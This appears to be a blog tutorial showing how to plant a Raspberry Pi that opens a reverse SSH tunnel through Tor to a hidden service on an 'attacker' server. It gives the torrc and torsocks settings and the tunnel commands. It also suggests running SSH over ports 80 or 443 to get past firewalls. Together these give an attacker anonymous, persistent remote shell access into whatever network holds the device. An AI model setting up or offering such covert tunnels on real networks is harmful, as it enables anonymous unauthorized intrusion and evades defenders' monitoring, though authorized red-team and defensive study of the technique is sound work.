Tor Remote Reverse-SSH Tunnel
Last modified: 26 January 2022
How to use TOR hidden service with SSH remote tunnel and how to use hidden service as an anonymous SSH proxy.
We will set a remote ssh tunnel from a raspi client towards a hidden service, accessible by an attacker.
- user pi on the Raspberry.
- user lobs on the Attacker Server.
- SSH server running on both.
- TOR server running on both.
- torsocks installed on raspi.
Torsocks allows you to use most applications in a safe way with Tor. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using.
TOR Hidden Service setup
On the attacker machine it is needed to setup a Hidden Service exposing itself to the whole TOR network. The service will expose the local ssh server needed to allow the raspi box to reverse ssh into it.
Edit the /etc/tor/torrc
file and modify these lines:
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 30022
where 30022 is the port open to the TOR network redirecting traffic to port 22.
For further client authorization look at the HiddenServiceAuthorizeClient
Then save and restart Tor. It will create the material needed to the hidden service in the hidden_service
folder. The last thing you need is the hostname which will refer to the hidden service located under /var/lib/tor/hidden_service/hostname
For example: irpqznciwifhpqgd.onion
Change also the file /etc/tor/torsocks.conf
the line:
AllowOutboundLocalhost 1
This is needed to torsocks
From the Raspberry:
- Copy the RSA key to the Server with:
$ ssh-copy-id -i .ssh/ [email protected]
If doesn’t already exists then:
$ ssh-keygen
- The command to launch is:
$ torsocks ssh -p 30022 -N -R 2222:localhost:22 [email protected]
This will use torsocks to ssh the Raspberry to the Attacker Hidden Service without specifying any command (-N) and tell the server to redirect ssh connection from local (server) port 2222 to remote (raspberry) port 22 (or whatever you want).
After that, on the Attacker Server there will be a ssh socket listening on port 2222 ready to redirect ssh traffic to tor to Raspberry through port 22.
You can always set up the raspberry to serve ssh connections on port 80 or 443 in order to avoid firewall issues. It depends on the firewall configurations.
The Attacker
The attacker just need to:
- SSH into his server on port 30022.
- Run the command:
$ ssh -p 2222 -l lobs localhost
The localhost listening service is automatically routing traffic to the TOR network. This means no loss of anonymity for both the client and the server.
attacker <—> TOR <—> HiddenService <—–> TOR <—-> client
This way if the Raspberry falls under someone’s else hands it has full access on the AttackerServer. If it has served its aim then you should remove the RSA key from the authorized_key on the server or just destroy the HiddenService.
Please feel free to make any comment! If anything is unclear, just write in the comment and I will update the post!Thanks for reading!